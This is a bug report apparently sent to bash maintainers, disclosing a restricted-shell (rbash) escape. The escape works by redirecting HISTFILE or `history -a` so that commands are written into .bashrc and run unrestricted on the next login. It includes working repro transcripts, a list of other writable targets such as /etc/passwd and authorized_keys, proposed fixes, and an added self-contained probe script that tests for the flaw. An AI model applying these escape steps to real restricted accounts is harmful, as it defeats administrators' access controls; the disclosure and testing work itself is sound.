Potential restricted bash escape by modifying history file
From: Diffie
Subject: Potential restricted bash escape by modifying history file
Date: Thu, 30 Apr 2020 14:22:31 -0400
User-agent: Cyrus-JMAP/3.3.0-dev0-351-g9981f4f-fmstable-20200421v1
Configuration Information [Automatically generated, do not change]:
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O2 -g -pipe -Wall -Werror=format-security
-Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions
-fstack-protector-strong -grecord-gcc-switches
-specs=/usr/lib/rpm/redhat/redhat-hardened-cc1
-specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -mtune=generic
-fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection
-Wno-parentheses -Wno-format-security
uname output: Linux host 5.5.17-200.fc31.x86_64 #1 SMP Mon Apr 13 15:29:42 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Machine Type: x86_64-redhat-linux-gnu
Bash Version: 5.0
Patch Level: 11
Release Status: release
*Description:*
It is possible to write/append arbitrary content to files from a restricted
bash shell (with the privileges of the current user context) by tweaking the
HISTFILE variable, or by specifying a filename to "history -[a][w]". This does
not necessarily lead to a restriction bypass in all configurations, but does in
a few that come to mind:
* If the user can write to their home directory they can append arbitrary code
to .bashrc/other shell files. These shell files will execute the code without
restrictions on subsequent runs of rbash (assuming rbash is not being run in
posix mode, and that --norc is not being passed)
* If the user is root they can trivially get an unrestricted shell by modifying
/etc/passwd, etc.
* If the cwd contains an executable script that the user can write to, they can
append to the script with arbitrary code, then invoke this code from rbash:
"hash -p executable_script mal_command ; mal_command" (this could be possible
with an executable binary too, although would be a little more complex)
* SSH authorized keys, various other configs.
* etc...
Again, it will depend on the configuration, but this seems exploitable in most
configurations of rbash (one where it may be more difficult to exploit is when
the user is placed into a non-home directory chroot where they have limited
write access).
*Repeat-By:*
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
[__RESTRICTED] bash-5.0$ export HISTFILE=$HOME/.bashrc
[__RESTRICTED] bash-5.0$ history -c
[__RESTRICTED] bash-5.0$ /usr/bin/whoami
[__RESTRICTED] bash: /usr/bin/whoami: restricted: cannot specify `/' in command names
[__RESTRICTED] bash-5.0$ history -a
[__RESTRICTED] bash-5.0$ exit
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
diffie # whoami inserted into .bashrc above
[__RESTRICTED] bash-5.0$
OR without using HISTFILE variable
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
[__RESTRICTED] bash-5.0$ history -a $HOME/.bashrc '
> /usr/bin/whoami
> '
[__RESTRICTED] bash-5.0$ exit
[UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
diffie
[__RESTRICTED] bash-5.0$
*Fix:*
* Disable writing to a specific file in rbash with "history -[a][w]
/tmp/bad_file bad_command" and make HISTFILE readonly. May be some other edge
cases here.
* Disable history in rbash altogether.
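The following probe is an added example and is not part of the report above or of bash itself. It replays the Repeat-By transcript non-interactively inside a throwaway HOME created with mktemp, so the only file that can be touched is a scratch .bashrc, and it tries both techniques the report describes: repointing HISTFILE before `history -a`, and passing the file name directly to `history -a`. The line it plants is an inert `:` no-op carrying a marker string (`histfile-probe-marker-1` / `-2`, names chosen here), since any line that lands in .bashrc already proves the write. It prints `vulnerable` (exit 0) when the restricted shell appended to .bashrc, which is the behaviour the report shows for bash 5.0, and `refused` (exit 1) when the shell blocked both attempts, which is what happens once rbash treats HISTFILE as unsettable and rejects file names given to the history builtin, as the report's Fix section asks for. `env -i` and `PATH=` are used so the child shell does not inherit HISTFILE, HISTCONTROL or BASH_ENV from the caller, and `set -o history` is required because stdin is a heredoc rather than a terminal.

```shell
#!/bin/sh
# Added probe for the rbash HISTFILE report; not the reporter's code.
# Re-creates the Repeat-By steps in a throwaway HOME and reports whether the
# restricted shell let `history -a' append to $HOME/.bashrc.
#
#   exit 0, prints "vulnerable"  .bashrc was modified from inside bash -r
#   exit 1, prints "refused"     neither technique modified .bashrc
#   exit 2                       bash or mktemp unavailable
#
# The planted line is an inert `:' no-op with a marker string (assumption made
# here: a surviving marker proves the write, so no real command is needed).

rbash_histfile_probe() {
    bash_bin=$(command -v bash) || return 2
    home=$(mktemp -d) || return 2
    printf '# original rc\n' > "$home/.bashrc"

    # env -i drops HISTFILE, HISTCONTROL and BASH_ENV from our own environment;
    # PATH= mirrors the report's `PATH= /bin/bash -r`.  The quoted heredoc is
    # the "typed" input, expanded by the child, not by this script.  Error
    # messages from a patched rbash go to stderr and are discarded.
    env -i HOME="$home" PATH= "$bash_bin" -r 2>/dev/null <<'EOF'
set -o history
: histfile-probe-marker-1
# Technique 1 from the report: repoint HISTFILE, then flush session history.
export HISTFILE=$HOME/.bashrc
history -a
# Technique 2 from the report: name the target file on the command line.
: histfile-probe-marker-2
history -a $HOME/.bashrc
EOF

    if grep -q 'histfile-probe-marker' "$home/.bashrc"; then
        result=vulnerable
        status=0
    else
        result=refused
        status=1
    fi
    rm -rf "$home"
    echo "$result"
    return "$status"
}

# Stand-alone use: run the probe and report the outcome.
if rbash_histfile_probe; then
    echo "exit status 0: rbash let history -a write to .bashrc"
else
    echo "exit status $?: rbash refused (or bash/mktemp not found)"
fi
```

To test a hardened deployment rather than a bare `bash -r`, point `bash_bin` at the wrapper or login shell actually assigned to the restricted account; a `refused` result only says that these two write paths are closed, not that the rest of the rbash configuration (writable home directory, writable scripts in the cwd, `hash -p`) is safe.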